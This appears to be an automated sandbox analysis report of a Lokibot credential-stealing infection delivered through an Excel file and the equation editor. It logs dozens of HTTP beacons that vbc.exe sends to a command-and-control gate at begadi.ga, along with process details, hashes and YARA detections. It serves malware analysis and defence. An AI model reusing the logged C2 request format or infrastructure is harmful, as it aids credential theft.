                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                58192.168.2.2249225185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:01.876667023 CET694OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:02.059926033 CET695INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:01 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                59192.168.2.2249226185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:02.621823072 CET696OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:02.813173056 CET696INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:02 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.2.2249173185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:34.978435993 CET623OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:35.166301012 CET623INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:34 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                60192.168.2.2249227185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:03.371543884 CET697OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:03.553005934 CET698INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:03 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                61192.168.2.2249228185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:03.833935022 CET698OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:04.038429976 CET699INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:03 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                62192.168.2.2249229185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:04.292102098 CET700OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:04.473880053 CET700INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:04 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                63192.168.2.2249230185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:04.727065086 CET701OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:04.906800032 CET702INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:04 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                64192.168.2.2249231185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:05.184514999 CET702OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:05.370029926 CET703INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:05 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                65192.168.2.2249232185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:05.631099939 CET704OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:05.812973022 CET704INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:05 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                66192.168.2.2249233185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:06.072212934 CET705OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:06.257530928 CET706INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:05 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                67192.168.2.2249234185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:06.518841982 CET707OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:06.707418919 CET707INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:06 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                68192.168.2.2249235185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:06.975399017 CET708OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:07.170943022 CET709INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:06 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                69192.168.2.2249236185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:07.433149099 CET709OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:07.616414070 CET710INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:07 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                7192.168.2.2249174185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:35.458679914 CET624OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:35.642134905 CET625INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:35 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                70192.168.2.2249237185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:07.882491112 CET711OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:08.079046011 CET711INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:07 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                71192.168.2.2249238185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:08.329480886 CET712OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:08.518978119 CET713INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:08 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                72192.168.2.2249239185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                73192.168.2.2249240185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                74192.168.2.2249241185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                75192.168.2.2249242185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                76192.168.2.2249243185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                77192.168.2.2249244185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                78192.168.2.2249245185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                79192.168.2.2249246185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                8192.168.2.2249175185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:35.934755087 CET626OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:36.116868019 CET626INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:35 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                80192.168.2.2249247185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                81192.168.2.2249248185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                82192.168.2.2249249185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                83192.168.2.2249250185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                84192.168.2.2249251185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                85192.168.2.2249252185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                86192.168.2.2249253185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                87192.168.2.2249254185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                88192.168.2.2249255185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                89192.168.2.2249256185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                9192.168.2.2249176185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:36.417718887 CET627OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:36.615479946 CET628INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:36 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                90192.168.2.2249257185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                91192.168.2.2249258185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                92192.168.2.2249259185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                93192.168.2.2249260185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                94192.168.2.2249261185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                95192.168.2.2249262185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                96192.168.2.2249263185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                97192.168.2.2249264185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                98192.168.2.2249265185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                99192.168.2.2249266185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: EXCEL.EXE PID: 2520 Parent PID: 584

                General

                Start time:08:32:59
                Start date:21/12/2020
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f280000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: EQNEDT32.EXE PID: 2320 Parent PID: 584

                General

                Start time:08:33:19
                Start date:21/12/2020
                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit):true
                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Imagebase:0x400000
                File size:543304 bytes
                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: vbc.exe PID: 2952 Parent PID: 2320

                General

                Start time:08:33:22
                Start date:21/12/2020
                Path:C:\Users\Public\vbc.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\Public\vbc.exe'
                Imagebase:0xe80000
                File size:584704 bytes
                MD5 hash:3EE960D7D595C82B47CE28164AFED056
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2195981464.0000000002377000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 33%, ReversingLabs
                Reputation:low

                Analysis Process: vbc.exe PID: 3040 Parent PID: 2952

                General

                Start time:08:33:27
                Start date:21/12/2020
                Path:C:\Users\Public\vbc.exe
                Wow64 process (32bit):true
                Commandline:{path}
                Imagebase:0xe80000
                File size:584704 bytes
                MD5 hash:3EE960D7D595C82B47CE28164AFED056
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >